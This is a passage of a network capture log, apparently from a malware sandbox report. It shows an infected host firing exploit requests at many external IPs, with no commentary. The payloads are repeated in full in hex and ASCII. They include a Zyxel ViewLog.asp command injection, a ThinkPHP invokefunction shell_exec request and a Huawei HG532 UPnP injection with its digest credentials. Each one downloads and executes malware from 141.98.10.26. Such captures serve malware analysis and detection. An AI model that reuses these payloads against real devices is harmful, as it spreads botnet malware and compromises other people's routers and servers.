Nov 22, 2023 08:38:34.390783072 CET	5427	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:34.946135044 CET	5440	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:35.501645088 CET	5567	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
235	192.168.2.23	46220	31.136.188.217	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:34.390826941 CET	5428	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:34.957643032 CET	5441	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:36.077471018 CET	5584	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:38.349137068 CET	5868	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:42.956491947 CET	6358	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:51.915303946 CET	7490	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:11.624496937 CET	9918	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:48.483325958 CET	14364	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
236	192.168.2.23	57650	94.122.19.129	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:34.426014900 CET	5429	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
237	192.168.2.23	54964	94.122.64.174	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:34.432971954 CET	5430	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
238	192.168.2.23	39790	31.44.128.154	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:34.629415989 CET	5434	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
239	192.168.2.23	50710	95.86.67.113	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:34.635694027 CET	5434	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
240	192.168.2.23	45920	94.228.169.63	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:34.675291061 CET	5437	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
241	192.168.2.23	51558	94.120.211.81	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:34.856517076 CET	5439	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
242	192.168.2.23	47922	31.52.62.0	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:35.167547941 CET	5453	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:35.345057964 CET	5479	IN	HTTP/1.0 404 Not Found !!! Pragma: no-cache Content-type: text/html <html> <head> <title>404 Not Found !!!</title> </head><body><div align="center"><center><table border="1" cellspacing="0" width="100%"> <tr> <td width="100%" bgcolor="#0000A0"> <p align="center"><font color="#FFFFFF" face="Arial"> <strong>404 Not Found !!!</strong></font></td> </tr> <tr> <td width="100%" bgcolor="#F3F3F3" bordercolor="#000080" bordercolordark="#000080"> <p align="center"><font face="Times New Romain" color="#000000"> <strong>The requested URL was not found on this server.</strong></font></td> </tr></table></body></html> Data Raw: Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port
243	192.168.2.23	56866	94.187.105.84	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:35.207706928 CET	5454	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
244	192.168.2.23	57418	94.121.103.241	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:35.212308884 CET	5455	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
245	192.168.2.23	45658	94.121.118.248	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:35.213197947 CET	5455	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
246	192.168.2.23	52570	88.213.226.130	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:35.232100964 CET	5456	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:38:35.413021088 CET	5563	IN	HTTP/1.1 400 Bad Request Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port
247	192.168.2.23	40666	88.198.237.24	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:35.244982958 CET	5466	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:38:35.433623075 CET	5564	IN	HTTP/1.1 400 Bad Request Date: Wed, 22 Nov 2023 07:38:35 GMT Server: Apache/2.4.56 (Unix) OpenSSL/1.1.1n PHP/8.2.8 Content-Length: 226 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
248	192.168.2.23	41498	88.99.47.67	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:35.245044947 CET	5467	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:38:35.433773041 CET	5565	IN	HTTP/1.1 400 Bad Request Server: nginx Date: Wed, 22 Nov 2023 07:38:14 GMT Content-Type: text/html Content-Length: 150 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
249	192.168.2.23	51374	197.56.98.195	37215

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:35.550534964 CET	5569	OUT	POST /ctrlt/DeviceUpgrade_1 HTTP/1.1 Content-Length: 430 Connection: keep-alive Accept: / Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669" Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 34 31 2e 39 38 2e 31 30 2e 32 36 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 6d 69 70 73 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 141.98.10.26 -l /tmp/binary -r /mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary mips)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Nov 22, 2023 08:38:35.897542953 CET	5580	OUT	POST /ctrlt/DeviceUpgrade_1 HTTP/1.1 Content-Length: 430 Connection: keep-alive Accept: / Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669" Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 34 31 2e 39 38 2e 31 30 2e 32 36 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 6d 69 70 73 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 141.98.10.26 -l /tmp/binary -r /mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary mips)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Nov 22, 2023 08:38:36.202421904 CET	5585	IN	HTTP/1.1 500 Internal Server Error Content-Type: text/xml; charset="utf-8" Server: Linux UPnP/1.0 Huawei-ATP-IGD EXT: Connection: Keep-Alive Content-Length: 398

Session ID	Source IP	Source Port	Destination IP	Destination Port
250	192.168.2.23	37688	95.100.241.59	80

Timestamp	kBytes transferred	Direction	Data
